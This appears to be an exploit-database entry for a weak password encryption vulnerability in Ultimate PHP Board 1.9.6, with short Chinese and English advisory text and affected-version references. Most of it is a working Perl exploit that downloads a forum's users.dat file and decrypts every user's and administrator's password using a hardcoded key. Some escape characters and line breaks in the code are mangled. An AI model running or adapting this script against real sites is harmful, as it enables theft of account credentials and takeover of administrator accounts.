https://www.exploit-db.com/exploits/25838
https://www.securityfocus.com/bid/13975
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-147

UltimatePHPBoard(UPB)1.9.6GOLD对users.dat文件的密码采用脆弱加密机制，攻击者可能利用CNNVD-200506-0155漏洞获得users.dat文件，然后利用此加密漏洞轻易窃取密码并获得特权。

source: http://www.securityfocus.com/bid/13975/info

Ultimate PHP Board is prone to a weak password encryption vulnerability. This issue is due to a failure of the application to protect passwords with a sufficiently effective encryption scheme.

This issue may allow a malicious user to gain access to user and administrator passwords for the affected application.

#!/usr/bin/perl
#
# Passwords Decrypter for UPB <= 1.9.6
# Related advisory:
http://www.securityfocus.com/archive/1/402461/30/0/threaded
# Discovered and Coded by Alberto Trivero

use Getopt::Std;
use LWP::Simple;
getopt('hfu');

print "nt========================================n";
print "t= Passwords Decrypter for UPB <= 1.9.6 =n";
print "t=          by Alberto Trivero          =n";
print "t========================================nn";

if(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {
   print "Usage:nperl $0 -h [full_target_path] [-f [output_file_name] OR -u
[username]]nn";
   print "Examples:nperl $0 -h http://www.example.com/upb/ -f
results.txtn";
   print "perl $0 -h http://www.example.com/upb/ -u Albyn";
   exit(0);
}

$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrh
mbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzv
qnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
$page=get($opt_h."db/users.dat") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $opt_hn";
@page=split(/n/,$page);

if($opt_f) {
   open(RESULTS,"+>$opt_f") || die "[-] Unable to open $opt_f: $!";
   print RESULTS "Results for $opt_hn","="x40,"nn";
   for($in=0;$in<@page;$in++) {
      $page[$in]=~m/^(.*?)<~>/ && print RESULTS "Username: $1n";
      $page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS "Crypted Password:
$1n";
      &decrypt;
      print RESULTS "Decrypted Password: $cryptnn";
      $crypt="";
   }
   close(RESULTS);
   print "[+] Results printed correct in: $opt_fn";
}

if($opt_u) {
   for($in=0;$in<@page;$in++) {
      if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {
        print "[+] Username: $opt_un";
        print "[+] Crypted Password: $1n";
         &decrypt;
         print "[+] Decrypted Password: $cryptn";
         exit(0);
      }
   }
   print "[-] Username '$opt_u' doesn't existn";
}

sub decrypt {
   for($i=0;$i<length($1);$i++) {
      $i_key=ord(substr($key, $i, 1));
      $i_text=ord(substr($1, $i, 1));
      $n_key=ord(substr($key, $i+1, 1));
      $i_crypt=$i_text + $n_key;
      $i_crypt-=$i_key;
      $crypt.=chr($i_crypt);
   }
}

Ultimate PHP Board Ultimate PHP Board 1.9.6

Ultimate PHP Board Ultimate PHP Board 1.9

Ultimate PHP Board Ultimate PHP Board 1.8.2

Ultimate PHP Board Ultimate PHP Board 1.8

来源:BID
名称:13975
链接:http://www.securityfocus.com/bid/13975
来源:BUGTRAQ
名称:20050616M4DR007-06SA(securityadvisory):MultiplevulnerabilitiesinUPB1.9.6GOLD
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111893777504821&w;=2